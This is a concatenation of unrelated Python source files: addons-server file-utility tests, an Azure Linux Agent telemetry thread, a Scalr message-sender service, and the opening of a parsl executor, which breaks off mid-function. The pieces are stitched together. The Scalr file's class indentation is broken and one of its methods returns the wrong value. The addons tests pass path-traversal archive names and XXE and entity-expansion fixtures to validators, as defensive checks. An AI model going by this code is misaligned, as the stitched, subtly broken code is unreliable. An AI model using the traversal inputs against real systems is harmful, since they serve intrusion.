def test_get_all_files_strip_prefix_no_prefix_silent():
    """strip_prefix without a corresponding `prefix` leaves paths unchanged."""
    tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
    os.mkdir(os.path.join(tempdir, 'dir1'))
    _touch(os.path.join(tempdir, 'foo1'))
    _touch(os.path.join(tempdir, 'dir1', 'foo2'))
    # strip_prefix alone doesn't do anything.
    assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
        os.path.join(tempdir, 'dir1'),
        os.path.join(tempdir, 'dir1', 'foo2'),
        os.path.join(tempdir, 'foo1'),
    ]
def test_get_all_files_prefix():
    """`prefix` is prepended verbatim to every returned (absolute) path."""
    tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
    os.mkdir(os.path.join(tempdir, 'dir1'))
    _touch(os.path.join(tempdir, 'foo1'))
    _touch(os.path.join(tempdir, 'dir1', 'foo2'))
    # (The old "strip_prefix alone doesn't do anything." comment was a
    # copy/paste leftover - this test only exercises `prefix`.)
    assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
        '/foo/bar' + os.path.join(tempdir, 'dir1'),
        '/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
        '/foo/bar' + os.path.join(tempdir, 'foo1'),
    ]
def test_get_all_files_prefix_with_strip_prefix():
    """With both arguments, the tempdir prefix is stripped and the new
    prefix prepended, yielding relocated paths."""
    tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
    os.mkdir(os.path.join(tempdir, 'dir1'))
    _touch(os.path.join(tempdir, 'foo1'))
    _touch(os.path.join(tempdir, 'dir1', 'foo2'))
    # strip_prefix removes the tempdir part before `prefix` is prepended.
    result = utils.get_all_files(
        tempdir, strip_prefix=tempdir, prefix='/foo/bar')
    assert result == [
        os.path.join('/foo', 'bar', 'dir1'),
        os.path.join('/foo', 'bar', 'dir1', 'foo2'),
        os.path.join('/foo', 'bar', 'foo1'),
    ]
def test_lock_with_lock_attained():
    """utils.lock yields True when the named lock is free to acquire."""
    with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
        assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
    """Spawn a child process that holds `lock_name` for `sleep` seconds,
    yield it to the caller, then join it on exit."""
    def _other_process_holding_lock():
        with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
            assert lock_attained
            time.sleep(sleep)
    other_process = multiprocessing.Process(target=_other_process_holding_lock)
    other_process.start()
    # Give the process some time to acquire the lock
    time.sleep(0.2)
    yield other_process
    other_process.join()
def test_lock_timeout():
    """A lock held by another process is attained only if our timeout
    outlasts the holder; otherwise acquisition fails gracefully."""
    with _run_lock_holding_process('test-lock-lock3', sleep=2):
        # Waiting for 3 seconds allows us to attain the lock from the parent
        # process.
        lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
        with lock as lock_attained:
            assert lock_attained
    with _run_lock_holding_process('test-lock-lock3', sleep=2):
        # Waiting only 1 second fails to acquire the lock
        lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
        with lock as lock_attained:
            assert not lock_attained
def test_parse_search_empty_shortname():
    """parse_search rejects an OpenSearch document whose <ShortName> element
    is missing or empty."""
    from olympia.files.tests.test_file_viewer import get_file
    fname = get_file('search_empty_shortname.xml')
    with pytest.raises(forms.ValidationError) as excinfo:
        utils.parse_search(fname)
    assert (
        str(excinfo.value.message) ==
        'Could not parse uploaded file, missing or empty <ShortName> element')
class TestResolvei18nMessage(object):
    """Tests for utils.resolve_i18n_message (__MSG_*__ placeholder lookup)."""
    def test_no_match(self):
        # Plain strings without the __MSG_..__ wrapper pass through.
        assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
    def test_locale_found(self):
        messages = {
            'de': {
                'foo': {'message': 'bar'}
            }
        }
        result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
        assert result == 'bar'
    def test_uses_default_locale(self):
        # The requested locale ('de') is absent, so the default is used.
        messages = {
            'en-US': {
                'foo': {'message': 'bar'}
            }
        }
        result = utils.resolve_i18n_message(
            '__MSG_foo__', messages, 'de', 'en')
        assert result == 'bar'
    def test_no_locale_match(self):
        # Neither `locale` nor `default_locale` are found, "message" is
        # returned unchanged
        messages = {
            'fr': {
                'foo': {'message': 'bar'}
            }
        }
        result = utils.resolve_i18n_message(
            '__MSG_foo__', messages, 'de', 'en')
        assert result == '__MSG_foo__'
    def test_field_not_set(self):
        """Make sure we don't fail on messages that are `None`
        Fixes https://github.com/mozilla/addons-server/issues/3067
        """
        result = utils.resolve_i18n_message(None, {}, 'de', 'en')
        assert result is None
    def test_field_no_string(self):
        """Make sure we don't fail on messages that are no strings"""
        result = utils.resolve_i18n_message([], {}, 'de', 'en')
        assert result == []
    def test_corrects_locales(self):
        # 'en' resolves against the existing 'en-US' catalog.
        messages = {
            'en-US': {
                'foo': {'message': 'bar'}
            }
        }
        result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
        assert result == 'bar'
    def test_ignore_wrong_format(self):
        # Entries must be dicts with a 'message' key; a bare string is
        # ignored and the placeholder returned unchanged.
        messages = {
            'en-US': {
                'foo': 'bar'
            }
        }
        result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
        assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
    """Test a few known vulnerabilities to make sure
    our defusedxml patching is applied automatically.
    This doesn't replicate all defusedxml tests.
    """
    def test_quadratic_xml(self):
        # "Quadratic blowup" entity expansion must be rejected.
        quadratic_xml = os.path.join(
            os.path.dirname(__file__), '..', 'fixtures', 'files',
            'quadratic.xml')
        with pytest.raises(forms.ValidationError) as exc:
            utils.extract_search(quadratic_xml)
        assert exc.value.message == u'OpenSearch: XML Security error.'
    def test_general_entity_expansion_is_disabled(self):
        zip_file = utils.SafeZip(os.path.join(
            os.path.dirname(__file__), '..', 'fixtures', 'files',
            'xxe-example-install.zip'))
        # This asserts that the malicious install.rdf blows up with
        # a parse error. If it gets as far as this specific parse error
        # it means that the external entity was not processed.
        #
        # Before the patch in files/utils.py, this would raise an IOError
        # from the test suite refusing to make an external HTTP request to
        # the entity ref.
        with pytest.raises(EntitiesForbidden):
            utils.RDFExtractor(zip_file)
    def test_lxml_XMLParser_no_resolve_entities(self):
        # Entity resolution is globally disabled for lxml parsers too.
        with pytest.raises(NotSupportedError):
            lxml.etree.XMLParser(resolve_entities=True)
        # not setting it works
        lxml.etree.XMLParser()
        # Setting it explicitly to `False` is fine too.
        lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
    """Tests for utils.get_background_images over static-theme zips."""
    # Fixture themes: current manifest format and the deprecated headerURL one.
    file_obj = os.path.join(
        settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip')
    file_obj_dep = os.path.join(
        settings.ROOT,
        'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
    def test_get_background_images(self):
        data = {'images': {'theme_frame': 'weta.png'}}
        images = utils.get_background_images(self.file_obj, data)
        assert 'weta.png' in images
        assert len(images.items()) == 1
        assert len(images['weta.png']) == 126447
    def test_get_background_deprecated(self):
        # Deprecated `headerURL` key still resolves the image.
        data = {'images': {'headerURL': 'weta.png'}}
        images = utils.get_background_images(self.file_obj_dep, data)
        assert 'weta.png' in images
        assert len(images.items()) == 1
        assert len(images['weta.png']) == 126447
    def test_get_background_images_no_theme_data_provided(self):
        # Without theme_data the manifest inside the zip is parsed instead.
        images = utils.get_background_images(self.file_obj, theme_data=None)
        assert 'weta.png' in images
        assert len(images.items()) == 1
        assert len(images['weta.png']) == 126447
    def test_get_background_images_missing(self):
        data = {'images': {'theme_frame': 'missing_file.png'}}
        images = utils.get_background_images(self.file_obj, data)
        assert not images
    def test_get_background_images_not_image(self):
        self.file_obj = os.path.join(
            settings.ROOT,
            'src/olympia/devhub/tests/addons/static_theme_non_image.zip')
        data = {'images': {'theme_frame': 'not_an_image.js'}}
        images = utils.get_background_images(self.file_obj, data)
        assert not images
    def test_get_background_images_with_additional_imgs(self):
        self.file_obj = os.path.join(
            settings.ROOT,
            'src/olympia/devhub/tests/addons/static_theme_tiled.zip')
        data = {'images': {
            'theme_frame': 'empty.png',
            'additional_backgrounds': [
                'transparent.gif', 'missing_&_ignored.png',
                'weta_for_tiling.png']
        }}
        images = utils.get_background_images(self.file_obj, data)
        assert len(images.items()) == 3
        assert len(images['empty.png']) == 332
        assert len(images['transparent.gif']) == 42
        assert len(images['weta_for_tiling.png']) == 93371
        # And again but only with the header image
        images = utils.get_background_images(
            self.file_obj, data, header_only=True)
        assert len(images.items()) == 1
        assert len(images['empty.png']) == 332
@pytest.mark.parametrize('value, expected', [
    # Removed a duplicated (1, '1/1/1') entry that ran an identical test
    # case twice for no benefit.
    (1, '1/1/1'),
    (12, '2/12/12'),
    (123, '3/23/123'),
    (123456789, '9/89/123456789'),
])
def test_id_to_path(value, expected):
    """id_to_path nests an id as <last digit>/<last two digits>/<full id>."""
    assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
    """Tests for utils.SafeZip hardening."""
    def test_raises_error_for_invalid_webextension_xpi(self):
        # A corrupt xpi raises ValidationError instead of crashing.
        with pytest.raises(forms.ValidationError):
            utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
    def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
        with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
            with pytest.raises(forms.ValidationError):
                # total uncompressed size of this xpi is: 2269 bytes
                utils.SafeZip(get_addon_file(
                    'valid_firefox_and_thunderbird_addon.xpi'))
class TestArchiveMemberValidator(TestCase):
    # We cannot easily test `archive_member_validator` so let's test
    # `_validate_archive_member_name_and_size` instead.
    def test_raises_when_filename_is_none(self):
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size(None, 123)
    def test_raises_when_filesize_is_none(self):
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size('filename', None)
    def test_raises_when_filename_is_dot_dot_slash(self):
        # Path traversal attempts are rejected.
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size('../', 123)
    def test_raises_when_filename_starts_with_slash(self):
        # Absolute paths are rejected.
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size('/..', 123)
    def test_raises_when_filename_is_dot_dot(self):
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size('..', 123)
    def test_does_not_raise_when_filename_is_dot_dot_extension(self):
        # '..' inside a filename (not as a path segment) is fine.
        utils._validate_archive_member_name_and_size('foo..svg', 123)
    @override_settings(FILE_UNZIP_SIZE_LIMIT=100)
    def test_raises_when_filesize_is_above_limit(self):
        with pytest.raises(forms.ValidationError):
            utils._validate_archive_member_name_and_size(
                'filename',
                settings.FILE_UNZIP_SIZE_LIMIT + 100
            )
|
send_telemetry_events.py | # Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import threading
import time
import traceback
from azurelinuxagent.common import logger
from azurelinuxagent.common.event import add_event, WALAEventOperation
from azurelinuxagent.common.exception import ServiceStoppedError
from azurelinuxagent.common.future import ustr, Queue, Empty
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
def get_send_telemetry_events_handler(protocol_util):
    """Factory for the telemetry-sender thread handler."""
    return SendTelemetryEventsHandler(protocol_util)
class SendTelemetryEventsHandler(ThreadHandlerInterface):
    """
    This Handler takes care of sending all telemetry out of the agent to Wireserver. It sends out data as soon as
    there's any data available in the queue to send.
    """
    _THREAD_NAME = "SendTelemetryHandler"
    # Max seconds to block on queue get/put before re-checking state.
    _MAX_TIMEOUT = datetime.timedelta(seconds=5).seconds
    # Try to batch at least this many events per wireserver request...
    _MIN_EVENTS_TO_BATCH = 30
    # ...but wait no longer than this for the batch to fill up.
    _MIN_BATCH_WAIT_TIME = datetime.timedelta(seconds=5)
    def __init__(self, protocol_util):
        self._protocol = protocol_util.get_protocol()
        self.should_run = True
        self._thread = None
        # We're using a Queue for handling the communication between threads. We plan to remove any dependency on the
        # filesystem in the future and use add_event to directly queue events into the queue rather than writing to
        # a file and then parsing it later.
        # Once we move add_event to directly queue events, we need to add a maxsize here to ensure some limitations are
        # being set (currently our limits are enforced by collector_threads but that would become obsolete once we
        # start enqueuing events directly).
        self._queue = Queue()
    @staticmethod
    def get_thread_name():
        return SendTelemetryEventsHandler._THREAD_NAME
    def run(self):
        logger.info("Start SendTelemetryHandler service.")
        self.start()
    def is_alive(self):
        return self._thread is not None and self._thread.is_alive()
    def start(self):
        # Daemon thread so it never blocks agent shutdown on its own.
        self._thread = threading.Thread(target=self._process_telemetry_thread)
        self._thread.setDaemon(True)
        self._thread.setName(self.get_thread_name())
        self._thread.start()
    def stop(self):
        """
        Stop server communication and join the thread to main thread.
        """
        self.should_run = False
        if self.is_alive():
            self.join()
    def join(self):
        # Wait until every queued event has been marked done, then join the
        # worker thread.
        self._queue.join()
        self._thread.join()
    def stopped(self):
        return not self.should_run
    def enqueue_event(self, event):
        # Add event to queue and set event
        if self.stopped():
            raise ServiceStoppedError("{0} is stopped, not accepting anymore events".format(self.get_thread_name()))
        # Queue.put() can block if the queue is full which can be an uninterruptible wait. Blocking for a max of
        # SendTelemetryEventsHandler._MAX_TIMEOUT seconds and raising a ServiceStoppedError to retry later.
        # Todo: Queue.put() will only raise a Full exception if a maxsize is set for the Queue. Once some size
        # limitations are set for the Queue, ensure to handle that correctly here.
        try:
            self._queue.put(event, timeout=SendTelemetryEventsHandler._MAX_TIMEOUT)
        except Exception as error:
            raise ServiceStoppedError(
                "Unable to enqueue due to: {0}, stopping any more enqueuing until the next run".format(ustr(error)))
    def _wait_for_event_in_queue(self):
        """
        Wait for at least one event in Queue or timeout after SendTelemetryEventsHandler._MAX_TIMEOUT seconds.
        In case of a timeout, set the event to None.
        :return: event if an event is added to the Queue or None to signify no events were added in queue.
        This would raise in case of an error.
        """
        try:
            event = self._queue.get(timeout=SendTelemetryEventsHandler._MAX_TIMEOUT)
            self._queue.task_done()
        except Empty:
            # No elements in Queue, return None
            event = None
        return event
    def _process_telemetry_thread(self):
        logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
        try:
            # On demand wait, start processing as soon as there is any data available in the queue. In worst case,
            # also keep checking every SendTelemetryEventsHandler._MAX_TIMEOUT secs to avoid uninterruptible waits.
            # In case the service is stopped but we have events in queue, ensure we send them out before killing
            # the thread.
            while not self.stopped() or not self._queue.empty():
                first_event = self._wait_for_event_in_queue()
                if first_event:
                    # Start processing queue only if first event is not None (i.e. Queue has at least 1 event),
                    # else do nothing
                    self._send_events_in_queue(first_event)
        except Exception as error:
            err_msg = "An unknown error occurred in the {0} thread main loop, stopping thread. Error: {1}, Stack: {2}".format(
                self.get_thread_name(), ustr(error), traceback.format_exc())
            add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
    def _send_events_in_queue(self, first_event):
        # Process everything in Queue
        start_time = datetime.datetime.utcnow()
        while not self.stopped() and (self._queue.qsize() + 1) < self._MIN_EVENTS_TO_BATCH and (
                start_time + self._MIN_BATCH_WAIT_TIME) > datetime.datetime.utcnow():
            # To promote batching, we either wait for at least _MIN_EVENTS_TO_BATCH events or _MIN_BATCH_WAIT_TIME
            # secs before sending out the first request to wireserver.
            # If the thread is requested to stop midway, we skip batching and send whatever we have in the queue.
            logger.verbose("Waiting for events to batch. Total events so far: {0}, Time elapsed: {1} secs",
                           self._queue.qsize()+1, (datetime.datetime.utcnow() - start_time).seconds)
            time.sleep(1)
        # Delete files after sending the data rather than deleting and sending
        self._protocol.report_event(self._get_events_in_queue(first_event))
    def _get_events_in_queue(self, first_event):
        # Generator: yield the first event, then drain whatever else is
        # currently queued without blocking.
        yield first_event
        while not self._queue.empty():
            try:
                event = self._queue.get_nowait()
                self._queue.task_done()
                yield event
            except Exception as error:
                logger.error("Some exception when fetching event from queue: {0}, {1}".format(ustr(error),
                                                                                              traceback.format_exc()))
msg_sender.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013, 2014 Scalr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from gevent import monkey
monkey.patch_all()
import os
import sys
cwd = os.path.dirname(os.path.abspath(__file__))
scalrpy_dir = os.path.join(cwd, '..')
sys.path.insert(0, scalrpy_dir)
import time
import socket
import requests
import multiprocessing
from scalrpy.util import helper
from scalrpy.util import dbmanager
from scalrpy.util import cryptotool
from scalrpy.util import application
from scalrpy import LOG
from scalrpy import exceptions
helper.patch_gevent()
# Module-level state: the running application instance plus counters used to
# compute the average delivery rate reported each iteration.
app = None
debug_rate_counter = 0
debug_rate_timestamp = time.time()
class MsgSender(application.ScalrIterationApplication):
nothing_todo_sleep = 5
    def __init__(self, argv=None):
        self.description = "Scalr messaging application"
        super(MsgSender, self).__init__(argv=argv)
        # Defaults; may be overridden from the Scalr config in configure().
        self.config.update({
            'cratio': 120,
            'pool_size': 250,
            'interval': 1,
            'workers': 1,
        })
        self.iteration_timeout = 180
        self._db = None
        self._pool = None
        # Ids of messages currently being delivered by greenlets; used to
        # avoid fetching/processing the same message twice.
        self._processing_messages = set()
        self._limit = 1000
        self._max_processing_messages = 1000
    def configure(self):
        """Merge msg_sender settings from the Scalr config, set the global
        socket timeout, and create the DB manager and greenlet pool."""
        helper.update_config(
            self.scalr_config.get('msg_sender', {}), self.config)
        helper.validate_config(self.config)
        socket.setdefaulttimeout(self.config['instances_connection_timeout'])
        self._db = dbmanager.ScalrDB(self.config['connections']['mysql'])
        self._pool = helper.GPool(pool_size=self.config['pool_size'])
        # Never keep more messages in flight than the pool can run.
        self._limit = self._max_processing_messages = min(1000, self.config['pool_size'])
    def _encrypt(self, server_id, crypto_key, data, headers=None):
        """Encrypt `data` with the server's scalarizr key and sign it.
        Returns (encrypted_data, headers) ready to be sent over HTTP."""
        assert server_id, 'server_id'
        assert crypto_key, 'scalarizr.key'
        assert data, 'data to encrypt'
        # 3DES-CBC - matches what scalarizr expects on the receiving side.
        crypto_algo = dict(name="des_ede3_cbc", key_size=24, iv_size=8)
        data = cryptotool.encrypt_scalarizr(crypto_algo, data, cryptotool.decrypt_key(crypto_key))
        headers = headers or dict()
        headers['X-Signature'], headers['Date'] = cryptotool.sign(data, crypto_key)
        headers['X-Server-Id'] = server_id
        return data, headers
    def get_messages(self):
        """Fetch up to `self._limit` pending outgoing V2 messages, oldest
        first, skipping ids already being processed and respecting the
        per-attempt retry delay (handle_attempts * cratio seconds)."""
        exclude = str(list(self._processing_messages))[1:-1]
        if exclude:
            exclude = 'AND m.messageid NOT IN ({})'.format(exclude)
        # NOTE(review): the query is assembled via string formatting; the
        # interpolated ids come from our own DB rows, but parameterized
        # queries would still be safer here.
        query = (
            "SELECT m.messageid message_id, m.server_id message_server_id, m.event_id, "
            "m.message_format, m.handle_attempts, m.message, m.message_name, m.status, "
            "s.server_id, s.farm_id, s.farm_roleid farm_role_id, s.remote_ip, s.local_ip, "
            "s.platform, s.status server_status "
            "FROM messages m "
            "LEFT JOIN servers s ON m.server_id = s.server_id "
            "WHERE m.type = 'out' "
            "AND m.status = 0 "
            "AND m.messageid IS NOT NULL "
            "AND m.messageid != '' "
            "AND m.message_version = 2 "
            "AND m.dtlasthandleattempt < DATE_SUB(UTC_TIMESTAMP(), INTERVAL m.handle_attempts*{cratio} SECOND) "
            "{exclude} "
            "ORDER BY m.dtadded ASC "
            "LIMIT {limit}"
        ).format(cratio=self.config['cratio'], exclude=exclude, limit=self._limit)
        return self._db.execute(query)
def load_servers_data(self, messages):
props = ['scalarizr.ctrl_port', 'scalarizr.key']
self._db.load_server_properties(messages, props)
for message in messages:
if 'scalarizr.ctrl_port' not in message:
message['scalarizr.ctrl_port'] = 8013
if 'scalarizr.key' not in message:
message['scalarizr.key'] = None
self._db.load_vpc_settings(messages)
return message
    def make_request(self, message):
        """Build the HTTP request dict (url, data, headers) for delivering
        `message` to its scalarizr control endpoint. Raises if the target
        ip cannot be determined."""
        data, headers = self._encrypt(
            message['server_id'],
            message['scalarizr.key'],
            message['message'])
        # Platform-specific connection policy falls back to the global one.
        instances_connection_policy = self.scalr_config.get(message['platform'], {}).get(
            'instances_connection_policy', self.scalr_config['instances_connection_policy'])
        ip, port, proxy_headers = helper.get_szr_ctrl_conn_info(
            message, instances_connection_policy)
        headers.update(proxy_headers)
        if not ip:
            msg = "Unable to determine ip"
            raise Exception(msg)
        if message['message_format'] == 'json':
            headers['Content-type'] = 'application/json'
        url = 'http://%s:%s/%s' % (ip, port, 'control')
        request = {
            'url': url,
            'data': data,
            'headers': headers,
        }
        return request
    def update(self, message):
        """Persist the delivery outcome for `message` and release it from
        the in-processing set.

        status == 1 means delivered: bump events.msg_sent, drop one-shot
        ExecScript messages entirely, and blank the (potentially large)
        message body. Any other status just records the attempt.
        """
        try:
            if message['status'] == 1:
                if message['event_id']:
                    query = (
                        "UPDATE events "
                        "SET msg_sent = msg_sent + 1 "
                        "WHERE event_id = '{event_id}'"
                    ).format(**message)
                    self._db.execute(query, retries=1)
                if message['message_name'] == 'ExecScript':
                    # ExecScript messages are one-shot: delete the row.
                    query = "DELETE FROM messages WHERE messageid = '{message_id}'".format(**message)
                    self._db.execute(query, retries=1)
                    return
                query = (
                    "UPDATE messages "
                    "SET status=1, message='', handle_attempts=handle_attempts+1, "
                    "    dtlasthandleattempt=UTC_TIMESTAMP() "
                    "WHERE messageid='{message_id}'").format(**message)
            else:
                query = (
                    "UPDATE messages "
                    "SET status={status}, handle_attempts=handle_attempts+1, "
                    "dtlasthandleattempt=UTC_TIMESTAMP() "
                    "WHERE messageid='{message_id}'").format(**message)
            self._db.execute(query, retries=1)
        finally:
            # Always release the message and count it towards the rate
            # metric, even if the DB update failed.
            global debug_rate_counter
            if message['message_id'] in self._processing_messages:
                debug_rate_counter += 1
                self._processing_messages.remove(message['message_id'])
    def process_message(self, message):
        """Deliver one message to its scalarizr instance over HTTP, then
        record the outcome (success, retry, or permanent failure) via
        update()."""
        try:
            try:
                request = self.make_request(message)
            except:
                # NOTE(review): bare except also swallows BaseException
                # subclasses (e.g. greenlet kill) - kept as-is to preserve
                # the existing gevent behavior.
                message['status'] = 3
                msg = "Make request failed, reason: {error}".format(error=helper.exc_info())
                raise Exception(msg)
            if not request['url']:
                message['status'] = 3
                msg = "Wrong request: {request}".format(request=request)
                raise Exception(msg)
            msg = "Send message: {message_id}, request: {request}"
            msg = msg.format(
                message_id=message['message_id'],
                request={'url': request['url'], 'headers': request['headers']})
            LOG.debug(msg)
            r = requests.post(
                request['url'],
                data=request['data'],
                headers=request['headers'],
                timeout=self.config['instances_connection_timeout'])
            if r.status_code != 201:
                msg = "Bad response code: {code}".format(code=r.status_code)
                raise Exception(msg)
            message['status'] = 1
            msg = "Delivery Ok, message: {message_id}"
            msg = msg.format(**message)
            LOG.debug(msg)
        except:
            # Third consecutive failure (handle_attempts is 0-based) marks
            # the message as permanently failed.
            if message['status'] == 0 and int(message['handle_attempts']) >= 2:
                message['status'] = 3
            msg = "Delivery failed, message: {message}"
            # Scrub secrets before the message dict hits the logs.
            message['scalarizr.key'] = '******'
            message['message'] = '******'
            msg = msg.format(message=message)
            helper.handle_error(message=msg, level='warning')
        self.update(message)
def do_iteration(self):
    """One scheduler pass: log throughput, fetch pending messages,
    shard them across worker processes, and dispatch them to the pool."""
    global debug_rate_counter
    global debug_rate_timestamp
    # Throughput since the previous iteration (messages/sec, messages/min).
    debug_rate_time = time.time() - debug_rate_timestamp
    rate = round(debug_rate_counter / debug_rate_time, 2)
    LOG.info('Average rate: %s, %s' % (rate, rate * 60))
    debug_rate_counter = 0
    debug_rate_timestamp = time.time()
    # Back-pressure: block until in-flight messages drop below the cap.
    while len(self._processing_messages) > self._max_processing_messages:
        LOG.warning('Reached the limit of simultaneously processed messages')
        time.sleep(1)
    messages = self.get_messages()
    # Skip messages still being handled from a previous iteration.
    messages = [m for m in messages if m['message_id'] not in self._processing_messages]
    num, idx = int(self.config['workers']), int(self.config['index'])

    def filter_messages(message):
        # Shard by farm_id across the worker processes; messages without a
        # server/farm association all go to worker #1.
        if message.get('server_id') and message.get('farm_id'):
            return int(message['farm_id']) % num == idx - 1
        else:
            return idx == 1
    if num > 1:
        # NOTE(review): under Python 3, `filter` returns an iterator, which
        # would make the `if not messages` check below always falsy. This
        # code appears to rely on Python 2 list semantics -- confirm runtime.
        messages = filter(filter_messages, messages)
    if not messages:
        time.sleep(self.nothing_todo_sleep)
        return
    self.load_servers_data(messages)
    # Only servers in these states may receive messages.
    server_statuses = [
        'Running',
        'Initializing',
        'Importing',
        'Temporary',
        'Pending terminate',
        'Pending suspend',
    ]
    for message in messages:
        try:
            self._processing_messages.add(message['message_id'])
            # Fail fast (status 3) for missing/ineligible servers; allow at
            # most one attempt for servers pending terminate/suspend.
            if message.get('server_id') is None or \
                    message['server_status'] not in server_statuses or (
                    message['server_status'] in ('Pending terminate', 'Pending suspend') and
                    int(message['handle_attempts']) >= 1):
                msg = (
                    "Server {message_server_id} doesn't exist or not in right status, "
                    "set message {message_id} status to 3").format(**message)
                LOG.warning(msg)
                message['status'] = 3
                self._pool.wait()
                self._pool.apply_async(self.update, (message,))
            else:
                self._pool.wait()
                self._pool.apply_async(self.process_message, (message,))
        except:
            msg = "Unable to process message: {message_id}, reason: {error}"
            msg = msg.format(message_id=message['message_id'], error=helper.exc_info())
            LOG.warning(msg)
    LOG.info('Messages still in processing: %s' % len(self._processing_messages))
def on_iteration_error(self):
    """Recovery hook: kill all in-flight pool tasks and reset tracking state."""
    self._pool.kill()
    # NOTE(review): rebinds rather than clears; any task still holding a
    # reference to the old set keeps it alive -- confirm this is intended.
    self._processing_messages = set()
def __call__(self):
    """Spawn one worker process per configured worker and wait for them all."""
    procs = []
    for worker_index in range(1, self.config['workers'] + 1):
        # Each child picks up its shard index from the shared config at fork.
        self.config['index'] = worker_index
        proc = multiprocessing.Process(target=super(MsgSender, self).__call__)
        proc.start()
        procs.append(proc)
    for proc in procs:
        proc.join()
def main():
    """Entry point: build the MsgSender app, load its config, and run it."""
    global app
    app = MsgSender()
    try:
        app.load_config()
        app.configure()
        app.run()
    except exceptions.AlreadyRunningError:
        # Another instance already holds the service lock; exit quietly.
        LOG.info(helper.exc_info(where=False))
    except (SystemExit, KeyboardInterrupt):
        # Normal shutdown paths; not an error.
        pass
    except:
        LOG.exception('Oops')
if __name__ == '__main__':
    main()
|
executor.py | """LowLatencyExecutor for low latency task/lambda-function execution
"""
from concurrent.futures import Future
import logging
import threading
import queue
from multiprocessing import Process, Queue
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.executors.low_latency import zmq_pipes
from parsl.executors.low_latency import interchange
from parsl.executors.errors import ScalingFailed, DeserializationError, BadMessage, UnsupportedFeatureError
from parsl.executors.status_handling import StatusHandlingExecutor
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
class LowLatencyExecutor(StatusHandlingExecutor, RepresentationMixin):
    """Parsl executor aimed at low-latency task execution.

    Tasks are serialized and pushed over ZMQ pipes to an interchange
    process, which forwards them to workers launched via the provider.
    """
def __init__(self,
             label='LowLatencyExecutor',
             provider=None,
             launch_cmd=None,
             address="127.0.0.1",
             worker_port=None,
             worker_port_range=(54000, 55000),
             interchange_port_range=(55000, 56000),
             # storage_access=None,
             working_dir=None,
             worker_debug=False,
             workers_per_node=1,
             # cores_per_worker=1.0,
             managed=True
             ):
    """Configure the executor; no processes start until start() is called.

    :param label: Name used for logging and the log directory.
    :param provider: Execution provider used to launch worker blocks.
        Defaults to a fresh LocalProvider when None.
    :param launch_cmd: Worker launch command template; a default
        lowlatency_worker.py command is used when not given.
    :param address: Address workers use to reach the interchange.
    :param worker_port: Fixed worker-facing port (optional).
    :param worker_port_range: Port range for the worker-facing socket.
    :param interchange_port_range: Port range for the client-facing pipes.
    :param working_dir: Working directory (currently stored only).
    :param worker_debug: Reserved for worker-side debug logging.
    :param workers_per_node: Workers launched per provisioned node.
    :param managed: Whether the DFK manages this executor.
    """
    logger.debug("Initializing LowLatencyExecutor")
    # BUG FIX: the default used to be `provider=LocalProvider()`, a mutable
    # default evaluated once at import time and shared by every executor
    # created without an explicit provider. Create one per instance instead.
    if provider is None:
        provider = LocalProvider()
    StatusHandlingExecutor.__init__(self, provider)
    self.label = label
    self.launch_cmd = launch_cmd
    self.provider = provider
    self.worker_debug = worker_debug
    # self.storage_access = storage_access if storage_access is not None else []
    # if len(self.storage_access) > 1:
    #     raise ConfigurationError('Multiple storage access schemes are not supported')
    self.working_dir = working_dir
    self.managed = managed
    self.blocks = []
    self.workers_per_node = workers_per_node
    self._task_counter = 0
    self.address = address
    self.worker_port = worker_port
    self.worker_port_range = worker_port_range
    self.interchange_port_range = interchange_port_range
    self.run_dir = '.'
    # TODO: add debugging, logdir, other functionality to workers
    if not launch_cmd:
